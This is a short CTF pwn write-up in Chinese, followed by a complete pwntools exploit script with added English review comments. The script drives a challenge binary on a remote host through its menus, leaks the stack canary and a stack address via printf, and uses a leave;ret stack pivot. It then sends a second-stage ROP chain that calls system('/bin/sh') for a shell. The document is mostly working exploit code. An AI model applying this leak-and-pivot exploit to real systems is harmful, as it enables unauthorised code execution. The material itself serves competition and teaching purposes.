re 题,硬逆就完了

在输入密码处可以通过 printf 函数泄露 canary 和栈地址

在结局0这里发现了栈迁移漏洞,题目自带 system,不过栈迁移的话只能用两个指令,所以再用 read 读一次然后调用 system(b'/bin/sh')
# pwntools exploit script for the CTF pwn challenge described in the writeup above.
# NOTE(review): no `from pwn import *` appears in this listing, yet context, remote,
# ELF, p64, u64, gdb, pause and sleep are all used below — the import line was
# presumably lost when the page was transcribed; confirm against the original.
from struct import pack      # not used anywhere in this listing
from ctypes import *         # not used anywhere in this listing
#from LibcSearcher import *

# Target is x86-64 Linux; 'debug' log level makes pwntools print every send/recv.
context(os='linux', arch='amd64', log_level='debug')


# --- thin wrappers around the pwntools tube `p` (assigned further down) ---

def s(a) :
    # Send raw bytes.
    p.send(a)

def sa(a, b) :
    # Wait for marker `a`, then send `b`.
    p.sendafter(a, b)

def sl(a) :
    # Send bytes followed by a newline.
    p.sendline(a)

def sla(a, b) :
    # Wait for marker `a`, then send `b` plus a newline.
    p.sendlineafter(a, b)

def r() :
    # Receive whatever is available.
    return p.recv()

def pr() :
    # Receive and print (used to consume/inspect a menu screen).
    print(p.recv())

def rl(a) :
    # Receive up to and including marker `a`.
    return p.recvuntil(a)

def inter() :
    # Hand the connection over to the user.
    p.interactive()

def debug():
    # Attach gdb to the local process and block; not called in this script.
    gdb.attach(p)
    pause()

def get_addr() :
    # Read up to the first 0x7f byte, keep the last 6 bytes and zero-extend to 8:
    # reconstructs a little-endian 64-bit value whose top non-zero byte is 0x7f
    # (the usual shape of an x86-64 user-space pointer). recvuntil stops at the
    # first 0x7f seen, so any earlier 0x7f byte in the stream corrupts the leak.
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

def get_sb() :
    # Resolve system() and a "/bin/sh" string inside libc relative to `libc_base`.
    # `libc_base` is never assigned in this script, so calling this would raise
    # NameError; it is not called here.
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

def csu(rdi, rsi, rdx, rip, gadget) :
    # Builds a ret2csu-style chain (the name and the gadget / gadget-0x1a pair
    # suggest __libc_csu_init); unused in this script.
    return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)


# --- target setup ---

#p = process('./pwn')
p = remote('1.14.71.254', 28392)   # remote challenge instance; local variant commented out above
elf = ELF('./pwn')
# Hard-coded local libc path; only referenced by get_sb(), which is never called.
libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc-2.27.so')

# Fixed addresses inside the challenge binary (presumably non-PIE, since they are
# used as absolute values). Roles are inferred from the names — verify in the binary.
rdi = 0x402bb3      # pop rdi ; ret
ret = 0x40101a      # ret        (unused below)
leave = 0x401337    # leave ; ret

# --- walk the menu to the password prompt ---
# The exact sequence of choices and blank lines mirrors the binary's prompts and
# is not explained further in the writeup.
sla(b'1.', b'1')
sl(b'xshhc')
sla(b'2.', b'1')
sla(b'2.', b'2')
for i in range(3):
    s(b'\n')
sla(b'2.', b'2')
for i in range(10):
    s(b'\n')
sla(b'2.', b'2')
pr()
for i in range(2):
    s(b'\n')
sla(b'xshhc', b'20161226')
for i in range(3):
    s(b'\n')

# --- leak canary and a stack address ---
# Send 0x19 bytes of filler into the password field and read the echo back; the
# 7 bytes that follow are the upper bytes of the stack canary (its low byte is 0,
# hence the left-pad with \x00). The writeup attributes this leak to printf.
s(b'a'*0x19)
rl(b'a'*0x19)
canary = u64(p.recv(7).rjust(8, b'\x00'))
stack = get_addr()   # a stack pointer leaked in the same output
#gdb.attach(p, 'b *0x402afb')

# --- navigate to "ending 0" (per the writeup, where the overflow lives) ---
for i in range(5):
    s(b'\n')
sl(b'3')
for i in range(11):
    s(b'\n')
sl(b'3')
for i in range(18):
    s(b'\n')

# --- stage one: stack pivot ---
# Filler, read() as the first return target, filler, the leaked canary, then
# saved rbp := stack-0x100 and return address := leave;ret — the stack migration
# described in the writeup. The 8+8 filler and 0x100/0xf8 offsets are specific to
# this binary's frame layout.
payload = b'a'*8 + p64(elf.sym['read']) + b'a'*8 + p64(canary) + p64(stack - 0x100) + p64(leave)
s(payload)
sleep(0.5)   # presumably lets the target reach read() before stage two arrives

# --- stage two, consumed by that read() into the pivoted frame ---
# "/bin/sh\0" twice, then pop rdi <- (stack - 0xf8) (points at the string), then system().
payload = b'/bin/sh\x00'*2 + p64(rdi) + p64(stack - 0xf8) + p64(elf.sym['system'])
s(payload)

print(' canary -> ', hex(canary))
print(' stack -> ', hex(stack))
inter()
pause()
